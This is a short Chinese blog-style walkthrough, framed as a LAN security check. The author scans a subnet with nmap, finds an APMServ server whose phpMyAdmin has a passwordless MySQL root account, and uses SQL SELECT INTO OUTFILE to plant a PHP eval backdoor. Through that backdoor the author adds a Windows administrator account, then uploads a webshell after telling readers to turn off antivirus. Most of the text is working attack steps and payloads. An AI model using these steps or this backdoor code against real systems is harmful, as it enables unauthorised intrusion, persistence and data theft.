今天对局域网进行了安全检查
先用nmap对网段进行扫描,看下机器都监听了哪些端口,刚知道nmap可以扫描整个网段
nmap 192.168.16.0/24
恩,有结果了,将结果保存下来,查找那些开了80的,将IP复制到浏览器逐个尝试
终于被我找到一台
浏览器访问
http://192.168.16.19/
允许列目录的
页面底部有服务器信息
Apache/2.2.9 (APMServ) PHP/5.2.6 Server at 192.168.16.19 Port 80
用的是APMserv,应该有phpMyAdmin,自己下载了个APMserv,对比了下目录结构
访问
http://192.168.16.19/phpmyadmin/
成功了,而且MySQL的root帐号没有设置密码,直接登录进去了
这时需要做的是找出网站存放的系统路径,APMserv默认是有phpinfo.php
尝试访问http://192.168.16.19/phpinfo.php
提示没有文件,看来只能另外找办法
回到phpmyadmin,点击“显示 MySQL 的系统变量”
可以看到MySQL的目录:F:\APMServ5.2.6\MySQL5.1\
那phpMyAdmin的目录就是F:\APMServ5.2.6\www\phpMyAdmin\
通过数据库,导出一个PHP文件
随便选个数据库,然后执行以下的sql
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘F:/APMServ5.2.6/www/phpMyAdmin/eval.php’;
Drop TABLE IF EXISTS a;
这是我们的后门
http://192.168.16.19/phpmyadmin/eval.php
加个系统帐号
http://192.168.16.19/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://192.168.16.19/phpmyadmin/eval.php?cmd=net localgroup administrators test /add
可惜没有开远程桌面,不能登陆
那不登录,传个webshell上去,下载些文件回来
下载“lanker一句话PHP后门客户端3.0内部版”
注意,杀毒软件会认为lanker一句话PHP后门客户端3.0内部版.htm是病毒,注意先关闭杀毒软件
我们后面地址是http://192.168.16.19/phpmyadmin/eval.php
传test.php上去,访问http://192.168.16.19/phpmyadmin/test.php
这就似乎我们的webshell了